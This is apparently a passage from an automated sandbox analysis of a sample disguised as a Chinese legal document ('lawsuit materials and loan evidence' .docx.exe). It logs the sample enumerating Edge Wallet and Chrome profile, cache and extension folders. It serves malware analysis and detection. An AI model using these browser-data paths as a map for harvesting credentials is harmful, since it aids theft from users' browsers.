Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-tokenized-card\id VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-tokenized-card\it VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-tokenized-card\ja VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-tokenized-card\nl VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-tokenized-card\pt-BR VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-tokenized-card\pt-PT VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-tokenized-card\ru VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-tokenized-card\sv VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-tokenized-card\zh-Hans VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-tokenized-card\zh-Hant VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\wallet VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\wallet\wallet-checkout VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\FirstPartySetsPreloaded VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\FirstPartySetsPreloaded\2023.9.25.0 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\FirstPartySetsPreloaded\2023.9.25.0\_metadata VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\GrShaderCache VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\GraphiteDawnCache VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\OriginTrials VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\OriginTrials\0.0.1.4 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\PKIMetadata VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\PKIMetadata\7.0.0.0 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\RecoveryImproved VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Safe Browsing VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SafetyTips VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SafetyTips\2983 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\ShaderCache VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\local VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Speech Recognition VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Subresource Filter VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Subresource Filter\Indexed Rules VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Subresource Filter\Indexed Rules\36 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Subresource Filter\Indexed Rules\36\10.34.0.50 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Subresource Filter\Unindexed Rules VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Subresource Filter\Unindexed Rules\10.34.0.50 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Trust Protection Lists VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\TrustTokenKeyCommitments VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\TrustTokenKeyCommitments\2023.9.4.1 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\TrustTokenKeyCommitments\2023.9.4.1\_metadata VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Typosquatting VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Typosquatting\1.20231004.1.0 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Typosquatting\1.20231006.1.0 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Web Notifications Deny List VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Web Notifications Deny List\2.0.0.4 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\WidevineCdm VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\WorkspacesNavigationComponent VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\WorkspacesNavigationComponent\1.0.0.5 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\ZxcvbnData VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\hyphen-data VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\hyphen-data\101.0.4906.0\_metadata VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\AutofillStates VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\CertificateRevocation VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crashpad VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabase VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabase VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cache VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm\index-dir VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\DawnCache VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\Files VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Rules VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Scripts VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension State VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\Temp VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\af VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\am VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\ar VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\az VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\be VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\bg VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\bn VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\ca VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\cs VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\cy VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\da VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\de VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\el VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\en VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\en_CA VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\en_GB VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\en_US VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\es VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\es_419 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\et VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\eu VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\fa VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\fi VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\fil VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\fr VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\fr_CA VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\gl VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\gu VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\hi VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\hr VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\hu VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\hy VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\id VolumeInformation	Jump to behavior
